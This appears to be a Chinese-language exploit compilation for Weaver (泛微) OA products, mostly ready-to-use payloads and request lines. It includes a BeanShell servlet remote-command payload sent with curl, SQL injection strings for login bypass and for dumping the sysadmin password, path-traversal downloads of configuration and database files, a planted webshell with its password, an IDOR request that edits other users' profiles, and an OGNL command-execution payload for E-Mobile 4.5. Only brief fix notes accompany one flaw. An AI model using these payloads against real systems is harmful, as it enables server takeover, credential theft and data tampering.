0x01 漏洞描述

泛微协同商务软件系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器权限。

0x02 漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03 影响范围

泛微 e-cology<=9.0

0x04 漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

0x05 poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev

al%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问；

2、https://www.weaver.com.cn/cs/securityDownload.asp

泛微OA系统在数据库配置信息泄露

0x01 漏洞描述

攻击者可通过该漏洞页面直接获取到数据库配置信息，攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息，如攻击者可直接访问数据库，则可直接获取用户数据，由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.

0x02 影响范围

目前已知为8.100.0531,不排除其他版本，包括不限于EC7.0、EC8.0、EC9.0版

0x03漏洞复现

 对这个漏洞要注意两点就是 ，获取密钥。默认密钥1z2x3c4v5b6n。使用密钥解密DES密文！这里使用python脚本自动完成这一步 脚本如下：

SQL注入

前台SQL注入

用户名：

admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a

密码: 1

验证页面参数 - loginid

（1）

/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=

（2）

/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=

未授权访问页面

//services/   存在注入

/ws/   存在注入

（3）

/weaver/weaver.file.SignatureDownLoad?markId=1  --参数markld

后台SQL注入

（1）

首先用使用测试账户登录，然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

（2）

管理员情况下的注入：

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:

http://127.0.0.1//cowork/CoworkLogView.jsp?id=151

普通用户注入地址：

http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址：

http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3

(3)

/list.do?module=2&scope=5#1

（4）

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

任意文件下载

测试链接 ：

http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843

其中，参数 ATTACHMENT_NAME 未有效的控制其范围，导致任意文件下载

配置文件下载（程序zend加密，在网站http://www.showmycode.com/中可以解密）

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843

数据库连接文件下载

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843

文件上传

http://xx.xx.cn:8028/attachment/2506423447/conf1g.php4 密码是8（system权限）

数据库后台访问

http://xx.xx.cn:8028/

phpmyadmin/

认证缺陷-绕过登录限制进入后台

则可注入的网址为 

http://xx.xx.cn:8028/building/urlurl.php 直接访问显示access denied，

使用hackbar。post内容中,url为general/index.php，smsid为注入sql，内容为1

union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1'，两者都经过DES3加密后再经过base64转码，点击excute...

数据库操作

/ws/query/

泛微eteams_oa系统越权修改任意用户信息

抓包得到一个链接：

https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509

这时候我们记住8005824116863355409这个东西

我们修改本用户资料处:

我们修改一下电话，然后抓包并且把里面的employee.id替换为8005824116863355409为:

url:https://www.eteams.cn/base/employee/saveProperty.json

postdata:

employee.id=8005824116863355409&propertyName=telephone&employee.telephone=test

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do

data：loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**:89/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

敏感文件泄露

/messager/users.data

/plugin/ewe/jsp/config.jsp

路径遍历

/plugin/ewe/admin/upload.jsp?id=11&dir=../../../

/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'